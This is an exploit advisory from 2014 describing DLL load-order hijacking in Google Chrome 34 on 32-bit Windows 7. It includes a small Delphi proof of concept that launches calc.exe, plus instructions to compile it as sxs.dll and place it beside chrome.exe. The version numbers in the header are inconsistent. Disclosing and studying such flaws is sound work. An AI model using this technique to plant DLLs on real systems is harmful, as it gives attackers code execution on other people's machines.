Google Chrome version 34.0.1847.131 suffers from a dll hijacking vulnerability.
1560865dcbadd6a8b9cbcd8e6fe8da194eb81a5bbed28f3278ea910f3d5ac68a
# google chrom latest Version 34.0.1847.131 m 32-bit DLL Order Hijacking
#
###########################
#
# Exploit Title: [google chrom Version 34.0.1847.131 m 32-bit DLL Order
Hijacking ]
# Date: [2014/04/25]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : https://www.linkedin.com/profile/view?id=276969082
# Vendor Homepage: [http://www.chromium.org/]
# Software Link: [http://www.filehorse.com/download-google-chrome/]
# Version: [Version 34.0.1847.116 32-bit ]
# Tested on: [Windows 7 Ultimate - 32bit]
#
###########################
details:
Untrusted search path vulnerability in chrom latest version [34.0.1847.131]
when running on Windows 7 32bit ,allows local users and possibly remote
attackers to gain privileges via a Trojan horse DLL in the current working
directory by sxs.dll
it's a DLL Order Hijacking that let me to execute arbitrary code beside
google chrome latest version of Chrome suffers from Load Order Hijacking of
"Sxs.dll" library, I attached a proof of concept code that will runs
besides your google chrome if you put it beside chrome.exe & it works like
a charm & will execute calc .
uses
Windows;
begin
Winexec(PAnsichar('C:\WINDOWS\system32\calc.exe'),sw_show);
end.
Compile Above Source Code With Delphi And Rename Compiled DLL To sxs.dll
Then Copy It To The chrom Installed Path, Now If You Run The chrom now DLL
Will Hijacked!